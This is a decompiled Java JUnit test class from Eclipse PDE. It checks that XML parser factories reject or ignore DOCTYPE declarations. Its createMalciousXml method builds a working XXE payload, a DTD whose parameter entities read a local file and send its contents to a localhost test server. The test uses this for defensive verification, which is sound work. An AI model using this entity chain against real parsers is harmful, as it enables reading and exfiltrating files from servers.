package org.eclipse.pde.core.tests.internal;

import java.io.BufferedReader;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.net.ServerSocket;
import java.net.Socket;
import java.net.SocketException;
import java.net.URI;
import java.net.URL;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.OpenOption;
import java.nio.file.Path;
import java.util.ArrayList;
import java.util.Collection;
import java.util.Iterator;
import java.util.List;
import java.util.concurrent.ConcurrentLinkedQueue;
import java.util.function.IntFunction;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.SAXParser;
import javax.xml.transform.Transformer;
import javax.xml.transform.TransformerException;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.stream.StreamResult;
import javax.xml.transform.stream.StreamSource;
import org.eclipse.core.internal.runtime.XmlProcessorFactory;
import org.hamcrest.CoreMatchers;
import org.hamcrest.MatcherAssert;
import org.junit.Assert;
import org.junit.Rule;
import org.junit.Test;
import org.junit.rules.TemporaryFolder;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.xml.sax.Attributes;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
import org.xml.sax.SAXParseException;
import org.xml.sax.helpers.DefaultHandler;

/* loaded from: input_file:tests.jar:org/eclipse/pde/core/tests/internal/PDEXmlProcessorFactoryTest.class */
public class PDEXmlProcessorFactoryTest {

    @Rule
    public TemporaryFolder tempFolder = new TemporaryFolder();
    static volatile Object sink;

    /* loaded from: input_file:tests.jar:org/eclipse/pde/core/tests/internal/PDEXmlProcessorFactoryTest$Server.class */
    public static final class Server implements AutoCloseable {
        private final Collection<Throwable> exceptionsInOtherThreads = new ConcurrentLinkedQueue();
        private final ServerSocket serverSocket = new ServerSocket(0);
        private final Thread httpServerThread = new Thread("httpServerThread") { // from class: org.eclipse.pde.core.tests.internal.PDEXmlProcessorFactoryTest.Server.1
            /* JADX WARN: Finally extract failed */
            @Override // java.lang.Thread, java.lang.Runnable
            public void run() {
                Throwable th;
                Throwable th2 = null;
                try {
                    try {
                        Socket accept = Server.this.serverSocket.accept();
                        th2 = null;
                        try {
                            try {
                                BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(accept.getInputStream()));
                                try {
                                    String readLine = bufferedReader.readLine();
                                    System.out.println(String.valueOf(accept.getInetAddress()) + ": " + readLine);
                                    th2 = null;
                                    try {
                                        OutputStream outputStream = accept.getOutputStream();
                                        try {
                                            outputStream.write("HTTP/1.1 200 OK\r\n".getBytes(StandardCharsets.UTF_8));
                                            if (outputStream != null) {
                                                outputStream.close();
                                            }
                                            MatcherAssert.assertThat(readLine, CoreMatchers.startsWith("GET"));
                                            MatcherAssert.assertThat(readLine, CoreMatchers.not(CoreMatchers.containsString("secret")));
                                            Assert.fail("Server was contacted");
                                            if (bufferedReader != null) {
                                                bufferedReader.close();
                                            }
                                            if (accept != null) {
                                                accept.close();
                                            }
                                        } catch (Throwable th3) {
                                            if (outputStream != null) {
                                                outputStream.close();
                                            }
                                            throw th3;
                                        }
                                    } finally {
                                    }
                                } catch (Throwable th4) {
                                    if (bufferedReader != null) {
                                        bufferedReader.close();
                                    }
                                    throw th4;
                                }
                            } finally {
                            }
                        } catch (Throwable th5) {
                            if (accept != null) {
                                accept.close();
                            }
                            throw th5;
                        }
                    } finally {
                        if (0 == 0) {
                            th2 = th;
                        } else if (null != th) {
                            th2.addSuppressed(th);
                        }
                        th = th2;
                    }
                } catch (SocketException unused) {
                } catch (Throwable th6) {
                    Server.this.exceptionsInOtherThreads.add(th6);
                }
            }
        };

        private Server() throws IOException {
            this.httpServerThread.start();
        }

        @Override // java.lang.AutoCloseable
        public void close() throws Exception {
            this.serverSocket.close();
            this.httpServerThread.join(5000L);
            Assert.assertFalse(this.httpServerThread.isAlive());
            Iterator<Throwable> it = this.exceptionsInOtherThreads.iterator();
            if (it.hasNext()) {
                Throwable next = it.next();
                throw new AssertionError(next.getMessage(), next);
            }
        }

        public int getLocalPort() {
            return this.serverSocket.getLocalPort();
        }

        public static void main(String[] strArr) throws Exception {
            Server server = new Server();
            System.out.println("Server startet on port: " + server.getLocalPort());
            server.httpServerThread.join();
            server.close();
        }
    }

    @Test
    public void testParseXmlWithExternalEntity() throws Exception {
        try {
            testParseXmlWithExternalEntity(XmlProcessorFactory.createSAXParserWithErrorOnDOCTYPE(), this::createMalciousXml);
            Assert.assertTrue("SAXParseException expected", false);
        } catch (SAXParseException e) {
            String message = e.getMessage();
            Assert.assertTrue(message, message.contains("DOCTYPE"));
            Assert.assertTrue(message, message.contains("http://apache.org/xml/features/disallow-doctype-decl"));
        }
    }

    @Test
    public void testParseXmlWithoutExternalEntity() throws Exception {
        testParseXmlWithExternalEntity(XmlProcessorFactory.createSAXParserWithErrorOnDOCTYPE(), this::createNormalXml);
    }

    @Test
    public void testParseXmlWithIgnoredExternalEntity() throws Exception {
        testParseXmlWithExternalEntity(XmlProcessorFactory.createSAXParserIgnoringDOCTYPE(), this::createMalciousXml);
    }

    @Test
    public void testParseXmlWithoutIgnoredExternalEntity() throws Exception {
        testParseXmlWithExternalEntity(XmlProcessorFactory.createSAXParserIgnoringDOCTYPE(), this::createNormalXml);
    }

    /* JADX WARN: Finally extract failed */
    public void testParseXmlWithExternalEntity(SAXParser sAXParser, IntFunction<InputStream> intFunction) throws Exception {
        Throwable th = null;
        try {
            Server server = new Server();
            try {
                final ArrayList arrayList = new ArrayList();
                DefaultHandler defaultHandler = new DefaultHandler() { // from class: org.eclipse.pde.core.tests.internal.PDEXmlProcessorFactoryTest.1
                    @Override // org.xml.sax.helpers.DefaultHandler, org.xml.sax.ContentHandler
                    public void startElement(String str, String str2, String str3, Attributes attributes) throws SAXException {
                        arrayList.add(str3);
                    }

                    @Override // org.xml.sax.helpers.DefaultHandler, org.xml.sax.ContentHandler
                    public void characters(char[] cArr, int i, int i2) throws SAXException {
                        String str = new String(cArr, i, i2);
                        Assert.assertFalse("Secret was injected into xml: " + str, str.contains("secret"));
                    }

                    @Override // org.xml.sax.helpers.DefaultHandler, org.xml.sax.EntityResolver
                    public InputSource resolveEntity(String str, String str2) throws IOException, SAXException {
                        try {
                            return new InputSource(URI.create(str2).toURL().openStream());
                        } catch (IOException e) {
                            throw new SAXException(e);
                        }
                    }
                };
                Throwable th2 = null;
                try {
                    InputStream apply = intFunction.apply(server.getLocalPort());
                    try {
                        sAXParser.parse(apply, defaultHandler);
                        if (apply != null) {
                            apply.close();
                        }
                        Assert.assertEquals(List.of("Body"), arrayList);
                        if (server != null) {
                            server.close();
                        }
                    } catch (Throwable th3) {
                        if (apply != null) {
                            apply.close();
                        }
                        throw th3;
                    }
                } catch (Throwable th4) {
                    if (0 == 0) {
                        th2 = th4;
                    } else if (null != th4) {
                        th2.addSuppressed(th4);
                    }
                    throw th2;
                }
            } catch (Throwable th5) {
                if (server != null) {
                    server.close();
                }
                throw th5;
            }
        } catch (Throwable th6) {
            if (0 == 0) {
                th = th6;
            } else if (null != th6) {
                th.addSuppressed(th6);
            }
            throw th;
        }
    }

    @Test
    public void testDocumentBuilderXmlWithExternalEntity() throws Exception {
        try {
            testParseXmlWithExternalEntity(XmlProcessorFactory.createDocumentBuilderWithErrorOnDOCTYPE(), this::createMalciousXml);
            Assert.assertTrue("SAXParseException expected", false);
        } catch (SAXParseException e) {
            String message = e.getMessage();
            Assert.assertTrue(message, message.contains("DOCTYPE"));
        }
    }

    @Test
    public void testDocumentBuilderFactoryWithoutExternalEntity() throws Exception {
        testParseXmlWithExternalEntity(XmlProcessorFactory.createDocumentBuilderFactoryWithErrorOnDOCTYPE().newDocumentBuilder(), this::createNormalXml);
    }

    @Test
    public void testDocumentBuilderWithoutExternalEntity() throws Exception {
        testParseXmlWithExternalEntity(XmlProcessorFactory.createDocumentBuilderWithErrorOnDOCTYPE(), this::createNormalXml);
    }

    @Test
    public void testDocumentBuilderFactoryIgnoringDoctypeNormal() throws Exception {
        testParseXmlWithExternalEntity(XmlProcessorFactory.createDocumentBuilderFactoryIgnoringDOCTYPE().newDocumentBuilder(), this::createNormalXml);
    }

    @Test
    public void testDocumentBuilderFactoryIgnoringDoctypeMalcious() throws Exception {
        testParseXmlWithExternalEntity(XmlProcessorFactory.createDocumentBuilderFactoryIgnoringDOCTYPE().newDocumentBuilder(), this::createMalciousXml);
    }

    @Test
    public void testDocumentBuilderIgnoringDoctypeNormal() throws Exception {
        testParseXmlWithExternalEntity(XmlProcessorFactory.createDocumentBuilderIgnoringDOCTYPE(), this::createNormalXml);
    }

    @Test
    public void testDocumentBuilderIgnoringDoctypeMalcious() throws Exception {
        testParseXmlWithExternalEntity(XmlProcessorFactory.createDocumentBuilderIgnoringDOCTYPE(), this::createMalciousXml);
    }

    /* JADX WARN: Finally extract failed */
    public void testParseXmlWithExternalEntity(DocumentBuilder documentBuilder, IntFunction<InputStream> intFunction) throws Exception {
        Throwable th = null;
        try {
            Server server = new Server();
            Throwable th2 = null;
            try {
                try {
                    InputStream apply = intFunction.apply(server.getLocalPort());
                    try {
                        Document parse = documentBuilder.parse(apply);
                        if (apply != null) {
                            apply.close();
                        }
                        Element documentElement = parse.getDocumentElement();
                        Assert.assertEquals("Body", documentElement.getTagName());
                        if (documentElement.getChildNodes().getLength() > 0) {
                            String nodeValue = documentElement.getChildNodes().item(0).getNodeValue();
                            Assert.assertFalse("Parser injected secret: " + nodeValue, nodeValue.contains("secret"));
                        }
                        if (server != null) {
                            server.close();
                        }
                    } catch (Throwable th3) {
                        if (apply != null) {
                            apply.close();
                        }
                        throw th3;
                    }
                } catch (Throwable th4) {
                    if (0 == 0) {
                        th2 = th4;
                    } else if (null != th4) {
                        th2.addSuppressed(th4);
                    }
                    throw th2;
                }
            } catch (Throwable th5) {
                if (server != null) {
                    server.close();
                }
                throw th5;
            }
        } catch (Throwable th6) {
            if (0 == 0) {
                th = th6;
            } else if (null != th6) {
                th.addSuppressed(th6);
            }
            throw th;
        }
    }

    @Test
    public void testTransformXmlWithExternalEntity() throws Exception {
        try {
            testParseXmlWithExternalEntity(XmlProcessorFactory.createTransformerFactoryWithErrorOnDOCTYPE(), this::createMalciousXml);
            Assert.assertTrue("TransformerException expected", false);
        } catch (TransformerException e) {
            String message = e.getMessage();
            Assert.assertTrue(message, message.contains("DTD"));
        }
    }

    @Test
    public void testTransformXmlWithoutExternalEntity() throws Exception {
        testParseXmlWithExternalEntity(XmlProcessorFactory.createTransformerFactoryWithErrorOnDOCTYPE(), this::createNormalXml);
    }

    /* JADX WARN: Finally extract failed */
    public void testParseXmlWithExternalEntity(TransformerFactory transformerFactory, IntFunction<InputStream> intFunction) throws Exception {
        Throwable th;
        Throwable th2 = null;
        try {
            Server server = new Server();
            Throwable th3 = null;
            try {
                try {
                    InputStream apply = intFunction.apply(server.getLocalPort());
                    try {
                        Transformer newTransformer = transformerFactory.newTransformer();
                        StreamSource streamSource = new StreamSource(apply);
                        th3 = null;
                        try {
                            ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
                            try {
                                newTransformer.transform(streamSource, new StreamResult(byteArrayOutputStream));
                                String byteArrayOutputStream2 = byteArrayOutputStream.toString(StandardCharsets.UTF_8);
                                if (byteArrayOutputStream != null) {
                                    byteArrayOutputStream.close();
                                }
                                if (apply != null) {
                                    apply.close();
                                }
                                Assert.assertTrue(byteArrayOutputStream2, byteArrayOutputStream2.contains("<Body>"));
                                Assert.assertFalse("Formatter injected secret: " + byteArrayOutputStream2, byteArrayOutputStream2.contains("secret"));
                                if (server != null) {
                                    server.close();
                                }
                            } catch (Throwable th4) {
                                if (byteArrayOutputStream != null) {
                                    byteArrayOutputStream.close();
                                }
                                throw th4;
                            }
                        } finally {
                        }
                    } catch (Throwable th5) {
                        if (apply != null) {
                            apply.close();
                        }
                        throw th5;
                    }
                } catch (Throwable th6) {
                    if (server != null) {
                        server.close();
                    }
                    throw th6;
                }
            } finally {
            }
        } catch (Throwable th7) {
            if (0 == 0) {
                th2 = th7;
            } else if (null != th7) {
                th2.addSuppressed(th7);
            }
            throw th2;
        }
    }

    private InputStream createMalciousXml(int i) {
        try {
            Path path = this.tempFolder.newFile("test.txt").toPath();
            Files.writeString(path, "secret", new OpenOption[0]);
            Path path2 = this.tempFolder.newFile("test.dtd").toPath();
            URL url = path.toUri().toURL();
            Files.writeString(path2, "<!ENTITY % var1 SYSTEM \"" + String.valueOf(url) + "\">\n<!ENTITY var4 SYSTEM \"" + String.valueOf(url) + "\">\n<!ENTITY % var2 \"<!ENTITY var3 SYSTEM 'http://localhost:" + i + "/?%var1;'>\">\n%var2;\n", new OpenOption[0]);
            return new ByteArrayInputStream(("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE var1 SYSTEM \"" + String.valueOf(path2.toUri().toURL()) + "\">\n<Body>&var3;&var4;</Body>").getBytes(StandardCharsets.UTF_8));
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
    }

    private InputStream createNormalXml(int i) {
        return new ByteArrayInputStream("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<Body>hello</Body>".getBytes(StandardCharsets.UTF_8));
    }

    public static void main(String[] strArr) throws Exception {
        for (int i = 1; i < 1000; i++) {
            long nanoTime = System.nanoTime();
            sink = XmlProcessorFactory.createSAXParserIgnoringDOCTYPE();
            System.out.println("createSAXParserIgnoringDOCTYPE run " + i + ": " + (System.nanoTime() - nanoTime) + "ns");
            long nanoTime2 = System.nanoTime();
            sink = XmlProcessorFactory.createDocumentBuilderFactoryWithErrorOnDOCTYPE();
            System.out.println("createDocumentBuilderFactoryWithErrorOnDOCTYPE run " + i + ": " + (System.nanoTime() - nanoTime2) + "ns");
            long nanoTime3 = System.nanoTime();
            sink = XmlProcessorFactory.createDocumentBuilderIgnoringDOCTYPE();
            System.out.println("createDocumentBuilderIgnoringDOCTYPE run " + i + ": " + (System.nanoTime() - nanoTime3) + "ns");
            long nanoTime4 = System.nanoTime();
            sink = XmlProcessorFactory.createDocumentBuilderWithErrorOnDOCTYPE();
            System.out.println("createDocumentBuilderWithErrorOnDOCTYPE run " + i + ": " + (System.nanoTime() - nanoTime4) + "ns");
            long nanoTime5 = System.nanoTime();
            sink = XmlProcessorFactory.createTransformerFactoryWithErrorOnDOCTYPE();
            System.out.println("createTransformerFactoryWithErrorOnDOCTYPE run " + i + ": " + (System.nanoTime() - nanoTime5) + "ns");
        }
    }
}
